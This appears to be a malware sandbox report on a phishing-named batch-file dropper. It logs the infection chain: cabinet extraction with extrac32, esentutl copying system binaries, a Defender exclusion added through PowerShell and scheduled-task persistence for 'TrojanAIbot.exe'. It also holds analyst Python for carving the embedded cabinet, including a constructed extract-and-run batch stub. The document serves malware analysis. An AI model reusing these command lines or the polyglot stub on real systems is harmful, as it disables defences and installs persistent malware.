Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\extrac32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat ReversingLabs: Detection: 23%
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat" "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o
Source: C:\Windows\SysWOW64\esentutl.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:05 /du 23:59 /sc daily /ri 1 /f
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFF65.tmp.cmd""
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: unknown Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Users\Public\Libraries\Wisrysxl.PIF "C:\Users\Public\Libraries\Wisrysxl.PIF"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: unknown Process created: C:\Users\Public\Libraries\Wisrysxl.PIF "C:\Users\Public\Libraries\Wisrysxl.PIF"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
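extrac32 is the Windows cabinet extractor, so for the observed extrac32 /y "...OM.bat" "...\x.exe" to succeed the batch file must carry a Microsoft Cabinet (MSCF structure) somewhere in its bytes, with the batch text around it. The report does not show where in the file the cabinet sits, so the added Python below (written for this page; not the sample's code and not a sandbox feature) scans for the MSCF signature at any offset instead of assuming offset zero, validates the CFHEADER fields, lists the CFFILE entries, and expands stored and MSZIP folders, which is what an analyst needs to recover x.exe without executing the script. LZX and Quantum folders are reported but not expanded. The polyglot it runs on is constructed inline: a short batch stub mirroring the command lines seen above, followed by a one-file cabinet built from the same struct definitions; none of it is the actual content of RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat.

```python
"""Added example: locate and unpack a Microsoft Cabinet embedded in a .bat polyglot."""
import struct
import zlib

CAB_MAGIC = b"MSCF"
CFHEADER = struct.Struct("<4sIIIIIBBHHHHH")  # signature .. iCabinet, 36 bytes
CFFOLDER = struct.Struct("<IHH")             # coffCabStart, cCFData, typeCompress
CFFILE = struct.Struct("<IIHHHH")            # cbFile, uoffFolderStart, iFolder, date, time, attribs; then name\0
CFDATA = struct.Struct("<IHH")               # csum, cbData, cbUncomp; then cbData bytes
RESERVE_PRESENT = 0x0004                     # CFHEADER.flags bit: per-structure reserve fields follow


def find_cabinets(blob):
    """Offsets of every plausible CFHEADER (assumed: the cabinet need not start at offset 0)."""
    hits, pos = [], blob.find(CAB_MAGIC)
    while pos != -1:
        if pos + CFHEADER.size <= len(blob):
            h = CFHEADER.unpack_from(blob, pos)
            cb, coff, vmin, vmaj, nfold, nfiles = h[2], h[4], h[6], h[7], h[8], h[9]
            if (vmaj, vmin) == (1, 3) and nfold and nfiles and coff < cb <= len(blob) - pos:
                hits.append(pos)
        pos = blob.find(CAB_MAGIC, pos + 1)
    return hits


def parse_cabinet(blob, base):
    """Return (folders, files, cbCFData reserve size) for the cabinet starting at `base`."""
    h = CFHEADER.unpack_from(blob, base)
    coff_files, nfold, nfiles, flags = h[4], h[8], h[9], h[10]
    pos, folder_res, data_res = base + CFHEADER.size, 0, 0
    if flags & RESERVE_PRESENT:
        hdr_res, folder_res, data_res = struct.unpack_from("<HBB", blob, pos)
        pos += 4 + hdr_res
    folders = []
    for _ in range(nfold):
        coff_data, ndata, ctype = CFFOLDER.unpack_from(blob, pos)
        folders.append((coff_data, ndata, ctype & 0x000F))
        pos += CFFOLDER.size + folder_res
    files, pos = [], base + coff_files
    for _ in range(nfiles):
        size, uoff, ifolder, _date, _time, attribs = CFFILE.unpack_from(blob, pos)
        pos += CFFILE.size
        end = blob.index(b"\x00", pos)
        name = blob[pos:end].decode("utf-8" if attribs & 0x80 else "latin-1")
        pos = end + 1
        files.append({"name": name, "size": size, "uoffset": uoff, "folder": ifolder})
    return folders, files, data_res


def expand_folder(blob, base, folder, data_res):
    """Concatenate a folder's CFDATA blocks; handles stored (0) and MSZIP (1) only."""
    coff_data, ndata, ctype = folder
    if ctype not in (0, 1):
        raise NotImplementedError(f"typeCompress {ctype} (LZX/Quantum) not handled")
    out, pos = bytearray(), base + coff_data
    for _ in range(ndata):
        _csum, cbytes, _cbuncomp = CFDATA.unpack_from(blob, pos)
        pos += CFDATA.size + data_res
        chunk, pos = blob[pos:pos + cbytes], pos + cbytes
        if ctype == 0:
            out += chunk
            continue
        if chunk[:2] != b"CK":
            raise ValueError("bad MSZIP block signature")
        # each MSZIP block is a raw deflate stream; its 32 KiB window carries over from the previous block
        history = bytes(out[-32768:])
        d = zlib.decompressobj(-15, zdict=history) if history else zlib.decompressobj(-15)
        out += d.decompress(chunk[2:]) + d.flush()
    return bytes(out)


def carve(blob):
    """name -> bytes for every file in every cabinet found in `blob`."""
    extracted = {}
    for base in find_cabinets(blob):
        folders, files, data_res = parse_cabinet(blob, base)
        cache = {}
        for f in files:
            if f["folder"] >= len(folders):  # 0xFFFD.. mark files continued across cabinets; skip
                continue
            if f["folder"] not in cache:
                cache[f["folder"]] = expand_folder(blob, base, folders[f["folder"]], data_res)
            extracted[f["name"]] = cache[f["folder"]][f["uoffset"]:f["uoffset"] + f["size"]]
    return extracted


def build_sample_polyglot(payload, name="x.exe", mszip=False):
    """Constructed test input: a batch stub (mirrors the report's command lines) plus a one-file cabinet."""
    body = payload
    if mszip:
        c = zlib.compressobj(9, zlib.DEFLATED, -15)
        body = b"CK" + c.compress(payload) + c.flush()
    cfdata = CFDATA.pack(0, len(body), len(payload)) + body
    cffile = CFFILE.pack(len(payload), 0, 0, 0, 0, 0x20) + name.encode() + b"\x00"
    coff_files = CFHEADER.size + CFFOLDER.size
    coff_data = coff_files + len(cffile)
    header = CFHEADER.pack(CAB_MAGIC, 0, coff_data + len(cfdata), 0, coff_files, 0, 3, 1, 1, 1, 0, 0x1234, 0)
    folder = CFFOLDER.pack(coff_data, 1, 1 if mszip else 0)
    stub = b'@echo off\r\nextrac32 /y "%~f0" "%TEMP%\\x.exe"\r\nstart "" "%TEMP%\\x.exe"\r\nexit\r\n'
    return stub + header + folder + cffile + cfdata


if __name__ == "__main__":
    sample = build_sample_polyglot(b"MZ" + bytes(range(256)) * 4, mszip=True)
    for fname, data in carve(sample).items():
        print(f"{fname}: {len(data)} bytes, starts {data[:2]!r}")
```

Against a real sample, read the .bat with open(path, "rb").read(), call carve() and hash the result; the recovered bytes should match the x.exe the sandbox saw, which lets the dropper be triaged statically before anything is detonated. A file that yields no cabinet but still calls extrac32 is worth a second look, since the cabinet may be written out at runtime rather than embedded.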
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll (3 consecutive identical entries)
Source: C:\Windows\System32\extrac32.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: url.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ieframe.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: spp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: vssapi.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: vsstrace.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ieproxy.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ieproxy.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ieproxy.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: msasn1.dll (3 consecutive identical entries)
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: mssip32.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: mssip32.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: mssip32.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: smartscreenps.dll (3 consecutive identical entries)
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: winhttpcom.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??????????.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll (3 consecutive identical entries)
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??????????.dll (2 consecutive identical entries)
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll (13 consecutive identical entries)
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll (35 consecutive identical entries)
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ???.dll (3 consecutive identical entries)
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??l.dll (2 consecutive identical entries)
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ?.dll (2 consecutive identical entries)
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??l.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ????.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ???e???????????.dll (2 consecutive identical entries)
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ?.dll (4 consecutive identical entries)
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??l.dll (2 consecutive identical entries)
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: sppc.dll (4 consecutive identical entries)
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: tquery.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: cryptdll.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: mssip32.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: endpointdlp.dll (4 consecutive identical entries)
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: advapi.dll (7 consecutive identical entries)
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: sppwmi.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: sppcext.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: winscard.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: sppc.dll (2 consecutive identical entries)
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: esent.dll
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: kernel.appcore.dll (2 consecutive identical entries)
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: esent.dll
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: kernel.appcore.dll (2 consecutive identical entries)
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: esent.dll
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: kernel.appcore.dll (2 consecutive identical entries)
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: apphelp.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: mpr.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: secur32.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: dnsapi.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: iphlpapi.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: ntmarta.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: propsys.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: edputil.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: urlmon.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: iertutil.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: srvcli.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: netutils.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: windows.staterepositoryps.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: wintypes.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: appresolver.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: bcp47langs.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: slc.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: onecorecommonproxystub.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ucrtbase_clr0400.dll (2 consecutive identical entries)
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: ucrtbase_clr0400.dll (2 consecutive identical entries)
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: slc.dll
